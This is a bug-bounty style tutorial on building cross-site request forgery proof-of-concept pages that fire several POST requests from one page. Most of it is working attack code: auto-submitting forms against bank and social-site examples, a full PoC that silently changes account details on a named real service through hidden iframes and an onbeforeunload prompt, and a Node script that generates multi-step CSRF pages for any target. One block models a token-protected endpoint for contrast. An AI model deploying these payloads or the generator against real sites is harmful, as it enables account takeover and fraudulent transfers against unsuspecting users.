How to create multi POST CSRF POC


CSRF is a widespread vulnerability. Some exploits need you to send several POST requests; this article will help you understand the CSRF attack and how to trick a browser into making multiple requests from a single page.

Hello Security training fans.

Today we are going to explain a problem that every white hat or bug bounty participant meets: you find a CSRF, but to exploit it you need to send two or more POST requests.

Let's start from the beginning.

What is CSRF?

Cross-site request forgery. For more details you can read about it at OWASP, but here we are considering beginners and staying far away from complexity, so let's say that CSRF is a vulnerability that occurs when an application cannot determine whether a request was sent by the real user or by an attacker.

Suppose the following scenario

If you are logged in to your account at mysocialwebsite.com and decide to change your account password, you:
1- navigate to account settings,
2- then security,
3- and press "change my password".
4- The website asks you to enter your new password, and you type Egypt12345.

Your browser will make the following request:

http://mysocialwebsite.com/account/security/password/change?password=Egypt12345&confirm=Egypt12345

This request is made by you.

Now suppose you visit a blog or website that contains the following code inside an HTML page:

______________________________________________________________________
<img src='http://mysocialwebsite.com/account/security/password/change?password=attackerpassword&confirm=attackerpassword' />
______________________________________________________________________

Your browser will render the img tag and, trying to load an image, send a request with your cookies to the address

 http://mysocialwebsite.com/account/security/password/change?password=attackerpassword&confirm=attackerpassword 

which was injected by the attacker. When mysocialwebsite receives this request it checks the cookie, recognises you, and changes your password to the one chosen by the attacker.
Two requests were sent by your browser: the first intentionally by you, the second a forgery injected by an attacker, but both change your password. That is a CSRF attack.
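To make the point concrete, here is an added example (not code from the article, and not how mysocialwebsite.com or any real site works) that models the password-change endpoint as plain Node functions: a vulnerable version that checks only the session cookie, next to a hardened version that also demands a per-session CSRF token that only the site's own pages can embed. The session table, the cookie and token formats, the parameter name csrf_token and the request objects are all constructed for the demo.

```javascript
// Added example, not code from the article: a toy model of the password-change
// endpoint in the story above, written as plain functions so it runs offline
// under Node. The session table, cookie and token formats are constructed for
// the demo; they are not how mysocialwebsite.com (or any real site) works.

const sessions = new Map(); // cookie value -> { user, csrfToken, password }

// Log a user in: the server issues a session cookie and, for the hardened
// variant, a per-session secret that only pages served by the site embed.
function login(user) {
  const cookie = `sess-${user}-${Math.random().toString(36).slice(2)}`;
  const csrfToken = `tok-${Math.random().toString(36).slice(2)}`;
  sessions.set(cookie, { user, csrfToken, password: 'original' });
  return { cookie, csrfToken };
}

function passwordOf(cookie) {
  return sessions.get(cookie).password;
}

// Vulnerable endpoint: the session cookie is the only thing it checks.
// The browser attaches that cookie to the <img>-triggered request exactly
// as it does to the real one, so the server cannot tell them apart.
function changePasswordVulnerable(req) {
  const s = sessions.get(req.cookie);
  if (!s) return { status: 401 };
  if (!req.params.password || req.params.password !== req.params.confirm) {
    return { status: 400 };
  }
  s.password = req.params.password;
  return { status: 200 };
}

// Hardened endpoint: same logic, plus the request must carry the session's
// CSRF token. The attacker's page lives on another origin and cannot read
// it, so a forged request arrives without it and is refused before any
// state changes. (A real implementation would also require POST and compare
// tokens in constant time; both are left out to keep the model short.)
function changePasswordHardened(req) {
  const s = sessions.get(req.cookie);
  if (!s) return { status: 401 };
  if (req.params.csrf_token !== s.csrfToken) return { status: 403 };
  if (!req.params.password || req.params.password !== req.params.confirm) {
    return { status: 400 };
  }
  s.password = req.params.password;
  return { status: 200 };
}

// The request the victim's browser emits for the attacker's <img> tag:
// the victim's cookie is present, the attacker's parameters are present,
// and the token is absent because the attacker never had it.
function forgedRequest(victimCookie) {
  return {
    cookie: victimCookie,
    params: { password: 'attackerpassword', confirm: 'attackerpassword' },
  };
}

// Walk through the story: the same forged request against both endpoints,
// then the genuine form (which carries the token) against the hardened one.
function demo() {
  const victim = login('victim');
  const forged = forgedRequest(victim.cookie);

  const vulnerable = changePasswordVulnerable(forged).status;
  const afterVulnerable = passwordOf(victim.cookie);

  sessions.get(victim.cookie).password = 'original'; // reset for the second run
  const hardened = changePasswordHardened(forged).status;
  const afterHardened = passwordOf(victim.cookie);

  const genuine = changePasswordHardened({
    cookie: victim.cookie,
    params: { password: 'Egypt12345', confirm: 'Egypt12345', csrf_token: victim.csrfToken },
  }).status;

  return { vulnerable, afterVulnerable, hardened, afterHardened, genuine,
           finalPassword: passwordOf(victim.cookie) };
}

console.log(demo());
```

The forged request gets a 200 and overwrites the password on the vulnerable endpoint and a 403 with no change on the hardened one, while the site's own form, which carries the token, still succeeds. That difference is exactly the "can the application tell who sent this" test in the definition above.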


What is our problem?

The problem we are going to talk about is that some websites are vulnerable to CSRF, but to exploit the vulnerability you need to send two or more POST requests.

Suppose the following scenario

1- Your brother wants to borrow some money.
2- You open your bank account.
3- You click NEW to start a new transfer of the money to your brother.
The following request is sent:

______________________________________________________________________
POST https://mybank.com/transfer/to/mybrotheraccount?amount=1000
Cookie: Your_cookie
______________________________________________________________________

4- The bank receives your request and asks you to confirm the transaction.
You hit "OK, I confirm", and your browser sends the following request:

______________________________________________________________________
POST https://mybank.com/transfer/last?confirm=1
Cookie: Your_cookie
______________________________________________________________________

There is no CSRF protection, but to exploit it and transfer money from a victim to your account you need to make the victim:
1- first send the money,
2- then confirm the transfer.

If the bank website accepted GET for transferring money it would be easy: you would just embed the following code in your website and make the victim visit it.

______________________________________________________________________
<img src='https://mybank.com/transfer/to/attacker_account?amount=5000' />
<img src='https://mybank.com/transfer/last?confirm=1' />
______________________________________________________________________

The browser tries to load the two "images", which in fact transfers the money to your account and confirms it; that alone lets you steal $5000 from a single user.

Great, but the bank accepts only POST requests.
OK, then you need to embed the following code in your blog, specifically in an article we will call A:

______________________________________________________________________
<body onload="document.getElementById('f1').submit()">
<form id='f1' action='https://mybank.com/transfer/to/attacker_account' method='POST'>
<input name='amount' value='1000' />
</form>
</body>
______________________________________________________________________

After that, you create a second article, call it B, and inject the following code to make the victim's browser confirm the transfer:

______________________________________________________________________
<body onload="document.getElementById('f1').submit()">
<form id='f1' action='https://mybank.com/transfer/last' method='POST'>
<input name='confirm' value='1' />
</form>
</body>
______________________________________________________________________

By making the victim browse articles A and B in sequence, we achieve our goal and transfer the money.

What if the attacker has only one opportunity to make the victim visit his website?
This is the main point of the article: if the bank accepted GET requests we could embed two images and exploit the CSRF, but since the website only accepts POST we need to send the two POST requests from a single page.

OK, let's make a single page submit two POST requests.

Suppose you visit a page containing the following code:

______________________________________________________________________
<script>
function expl(){
document.getElementById('f1').submit();
document.getElementById('f2').submit();
}
</script>
<body onload="expl()">
<form id='f1' action='https://facechat.com/mygroups/admins/remove/?id=realadmin' method='post'>
</form>
<form id='f2' action='https://facechat.com/mygroups/admins/add/?id=attacker' method='post'>
</form></body>
______________________________________________________________________

It will not send both POST requests. Why?
Let's break down the code:
1- We have two forms with ids f1 and f2.
2- We set the body onload event to call a function named expl() when the document has loaded.
3- Once the document has loaded the function runs and submits the first form, f1.
4- But submitting a form is a top-level navigation: the page is on its way out as soon as the first submit() starts, and a second submit() from the same script does not add a second request alongside it, it replaces the pending navigation (which of the two actually reaches the server varies by browser).
5- We end up on facechat.com/mygroups/admins/remove.


Can you see what happened?

In this run we successfully removed the admin but failed to add the attacker as a new admin; worse, the victim is redirected to facechat.com/mygroups/admins/remove and sees that changes were made.


Let's face the problem

What do we need? To send two POST requests.
What prevents us? We cannot send two POST requests from a single page by plain form submission, because each submission navigates away.
OK, so how will we do it? With JavaScript, without any user interaction.
What else do we need? The attack must run without the user noticing: no redirections, and no visible content or message should appear.


The solution

We will use an iframe and set the form's target attribute to that iframe. When the form is submitted, the response is loaded into the iframe instead of the main page. The user would still see the iframe, so we hide it with the following code:

______________________________________________________________________
<iframe name="if1" style="display:none" width="0" height="0" frameborder="0"></iframe>
______________________________________________________________________

Now, if the following form:

______________________________________________________________________
<form id="form1" target="if1" action='x'></form>
<iframe name="if1" style="display:none" width="0" height="0" frameborder="0"></iframe>
______________________________________________________________________

is submitted, the response loads inside the hidden iframe and the page's appearance does not change.

That is the core of the solution.

But two new problems arise here:
1- The first form will be submitted, but what about the others? The user may close the page and cancel the remaining submissions. Solution: register an onbeforeunload handler so the browser asks the user to confirm before leaving. Caveat: current browsers ignore the custom message text and show their own generic prompt, and some only show it if the user has already interacted with the page.
2- The second form may be submitted before the first; in our case the browser might confirm the transfer (request 2) before the money is actually sent (request 1). Solution: set a timeout (a sleep) before each following POST. A fixed delay makes the order likely rather than guaranteed, so use a generous one.

Now I think we have solved all the problems.

The final algorithm:
1- Create form 1 and set its target to iframe1.
2- Create form 2 and set its target to iframe2.
3- Submit the first form.
4- Wait two or three seconds.
5- Submit the next form.


Final POC

We have a real, disclosed example related to Mailchimp.com: an issue that allowed an attacker to change a user's account info. We are not responsible for any illegal usage, please be an angel 😀

Let's break down the issue:
1- Mailchimp account settings are protected against CSRF using tokens.
2- When you first create an account, Mailchimp shows you a wizard that helps you edit your account info quickly.
3- This wizard is not protected against CSRF.
4- An attacker can use the wizard to edit a logged-in user's info.
5- If the vulnerability is exploited and the account info is changed, the hacked user is redirected to complete the wizard steps, so he/she can detect that something happened.
6- So an attacker needs to send multiple POST requests: the first to edit the user info, the second to complete the wizard steps so that the victim is not redirected.

So the final PoC used is:

______________________________________________________________________
<!DOCTYPE html><html><head>
<title> MailChimp CSRF Proof Of Concept</title>
<script type="text/javascript">

function exec1()
{
document.getElementById('form1').submit();
setTimeout(exec2, 3000);
}
function exec2()
{
document.getElementById('form2').submit();
}
window.onbeforeunload=function(){
return "please wait";
}
</script>

</head><body onload="exec1();">
<h3> Dear User </h3><h4><div id='r3'> Congrats! </div> </h4>

<form id="form1" target="if1" action="https://us14.admin.mailchimp.com/signup/new-user/welcome-wizard" method="POST">
<input type="hidden" name="step" value="flname" />
<input type="hidden" name="fname" value="youarehacked" />
<input type="hidden" name="lname" value="xGersy" />
<input type="hidden" name="x" value="x" />
</form>

<form id="form2" target="if2" action="https://us14.admin.mailchimp.com/signup/new-user/welcome-wizard" method="POST">
<input type="hidden" name="step" value="finish" />
</form>
<iframe name="if1" style="display:none" width="0" height="0" frameborder="0"></iframe>
<iframe name="if2" style="display:none" width="0" height="0" frameborder="0"></iframe>

</body></html>

______________________________________________________________________

Let's explain the code in detail, from bottom to top.

1- The first part is the two hidden iframes.
2- The second part is the two forms: the first edits the user info, the second finishes the wizard steps.
3- The body onload event starts the JS code.
4- The JS code:
– submits the first form,
– waits three seconds,
– submits the second form,
– and sets the onbeforeunload event to discourage the user from closing the window.
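As an added example (not the article's code and not Mailchimp's), here is a small Node script that generates the PoC page from a list of POST steps, generalising the two-step algorithm above to any number of steps: one hidden form per step, one hidden iframe per step, and a timed chain of submissions. The function names (buildPoc, renderForm, countSteps) are mine, and the URLs and parameters in the sample input are invented placeholders, not a real site.

```javascript
// Added example, not the article's or Mailchimp's code: a generator for the
// multi-step POST CSRF PoC page described above, generalised from two steps
// to any number. Each step becomes a hidden form posting into its own hidden
// iframe, and the steps are submitted one at a time with a delay between them,
// as in the article's final algorithm. The URLs and parameters in the sample
// input at the bottom are invented placeholders.

function escapeAttr(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// One hidden form per step; the index ties form fN to iframe ifN.
function renderForm(step, i) {
  const inputs = Object.entries(step.params || {}).map(
    ([name, value]) =>
      `  <input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}">`,
  );
  return [
    `<form id="f${i}" target="if${i}" action="${escapeAttr(step.action)}" method="POST">`,
    ...inputs,
    '</form>',
  ].join('\n');
}

// display:none keeps the response out of sight; the zero size and
// frameborder="0" are a fallback for a page that strips inline styles.
function renderIframe(i) {
  return `<iframe name="if${i}" style="display:none" width="0" height="0" frameborder="0"></iframe>`;
}

// Build the complete PoC page. delayMs is the pause between submissions (the
// article uses 3000). A fixed delay only makes the order likely, not
// guaranteed, so raise it if the first step is slow to land.
function buildPoc(steps, delayMs = 3000) {
  if (!Array.isArray(steps) || steps.length === 0) {
    throw new Error('buildPoc: need at least one step');
  }
  const forms = steps.map(renderForm).join('\n');
  const iframes = steps.map((_, i) => renderIframe(i)).join('\n');
  const script = [
    'function submitStep(i) {',
    "  document.getElementById('f' + i).submit();",
    `  if (i + 1 < ${steps.length}) setTimeout(function () { submitStep(i + 1); }, ${delayMs});`,
    '}',
    // Discourages closing the tab mid-sequence; modern browsers show their own
    // generic prompt (the text is ignored) and may require prior interaction.
    "window.onbeforeunload = function () { return 'please wait'; };",
    'window.onload = function () { submitStep(0); };',
  ].join('\n');
  return [
    '<!DOCTYPE html><html><head>',
    '<title>Multi-step CSRF PoC</title>',
    '<script>\n' + script + '\n</script>',
    '</head><body>',
    '<h3>Dear User</h3><h4>Congrats!</h4>',
    forms,
    iframes,
    '</body></html>',
  ].join('\n');
}

// Helper for checking a generated page: how many steps it will submit.
function countSteps(html) {
  return (html.match(/<form /g) || []).length;
}

// Sample input (constructed): the two-step shape of the bank scenario above.
const sampleSteps = [
  { action: 'https://mybank.example/transfer/to/attacker_account', params: { amount: '1000' } },
  { action: 'https://mybank.example/transfer/last', params: { confirm: '1' } },
];

const samplePage = buildPoc(sampleSteps);
console.log(samplePage);
```

Save the printed page as an HTML file on your own host and open it while logged in to a test account on the target; every parameter value is attribute-escaped, so a value containing quotes cannot break the form or leak out of the attribute.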

I think you now know how to create a multi-POST CSRF PoC. One last check before you report: a session cookie marked SameSite=Lax or SameSite=Strict is not attached to a cross-site POST, so look at the target's cookie attributes first, or the PoC will fail for a reason unrelated to the application's own CSRF protection.


Further reading

OWASP CSRF
Wikipedia
OWASP CSRF Prevention Cheat Sheet
Acunetix
ceriksen.com article
webappsec

